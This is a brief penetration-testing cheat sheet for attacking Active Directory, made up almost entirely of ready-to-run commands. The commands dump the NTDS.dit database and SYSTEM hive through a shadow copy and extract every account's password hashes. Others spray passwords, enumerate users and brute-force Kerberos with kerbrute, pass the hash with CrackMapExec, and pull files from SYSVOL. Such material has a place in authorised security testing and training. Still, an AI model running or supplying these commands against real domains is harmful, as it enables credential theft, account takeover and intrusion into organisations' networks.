🔧Testing Active Directory


Load DSInternals using Powershell

Set-ExecutionPolicy Unrestricted
Install-Module -Name DSInternals

Install Impacket in Linux

sudo apt install python3-impacket

Install BloodHound in Linux

sudo apt install bloodhound
pip install bloodhound

Install Kerbrute

Install Crackmapexec

sudo apt install crackmapexec

Extract the AD hashes

reg SAVE HKLM\SYSTEM c:\temp\sys

vssadmin create shadow /for=C:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit c:\temp\dit

ESENTUTL /p c:\temp\dit /!1024 /8 /o
$key=Get-BootKey -SystemHiveFilePath c:\temp\sys

Get-ADDBAccount -All -BootKey $key -DBPath c:\temp\dit

Password spraying Active Directory

Import-Module c:\tools\DomainPasswordSpary.ps1
Invoke-DomainPasswordSpary -Password kitty-kat
Invoke-DomainPasswordSpary -PasswordList c:\tools\adpass.txt

Kerberos brute-forcing attacks


Username Enumeration

./kerbrute userenum -d cybex.com --dc <domain IP> <username list>

Password Attack

./kerbrute passwordspary -d cybex.com --dc <domain IP> <password-list> <password>

CrackMapExec to access and enumerate AD

crackmapexec smb <ip/cidr>

Pass The Hash Attack

crackmapexec smb <domain IP> -u "<username>" -H "<password hash>"
crackmapexec smb <domain IP> -u "username" -p <password.txt>

Investigate the SYSVOL share

smbclient \\\\<Domain IP address>\\sysvol -U <username>

Retrieve a File

smb> get <file name or file location>

Take advantage of legacy data


  • Open Jxplorer

  • Enter username and password

  • Select a user

  • Select Table Editor Column at the right hand side

  • Decode the Info value (base64 encoded)

Decode Base64 value

echo "<base64 encoded text>" | base64 -d

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